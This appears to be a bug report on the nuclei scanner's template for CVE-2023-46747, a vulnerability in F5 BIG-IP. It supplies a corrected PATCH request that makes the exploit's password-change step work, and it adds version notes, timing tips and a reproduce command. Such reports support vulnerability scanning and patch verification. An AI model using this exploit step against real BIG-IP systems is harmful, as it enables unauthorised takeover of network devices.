Description
I've been investigating CVE-2023-46747 on various versions of BIG-IP and found that the nuclei template for this vulnerability has an invalid PATCH request that fails with a 401 response, disrupting all subsequent requests due to the use of the resultant invalid value of password2 and causing the exploit to fail. Through my own testing, I've figured out what a correct PATCH request looks like, and in the template it should be:
PATCH /mgmt/tm/auth/user/{{hex_decode(username)}} HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(hex_decode(username)+":"+hex_decode(password))}}
Content-Type: application/json;charset=UTF-8
Origin: https://{{Hostname}}
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://{{Hostname}}/tmui/tmui/login/expired_password/app/index.html
{"oldPassword":"{{hex_decode(password)}}","password": "{{password2}}"}
Note the addition of several headers and the inclusion of "oldPassword" in the JSON. I've confirmed that the updated template works against BIG-IP versions 16.1.2 and 17.1.0.3. Note that in version 16.1.2 (and earlier versions) accounts are created with an active password and the PATCH request is not necessary at all.
Also note that, at least in my testing, exploitation is a little unstable. It helps to build in time delays between sending some of the requests. Without any delays, exploitation tends to fail in version 16.1.3.1 in particular, even with the updated PATCH request template.
The original, incorrect PATCH template has been confirmed NOT to work in versions 15.1.8, 16.1.2, 16.1.3.1, and in 17.1.0.3.
Nuclei Version:
3.0.3
Template file:
http/cves/2023/CVE-2023-46747.yaml
Command to reproduce:
./nuclei -u https://192.168.92.138 -t cves/2023/CVE-2023-46747.yaml -v -debug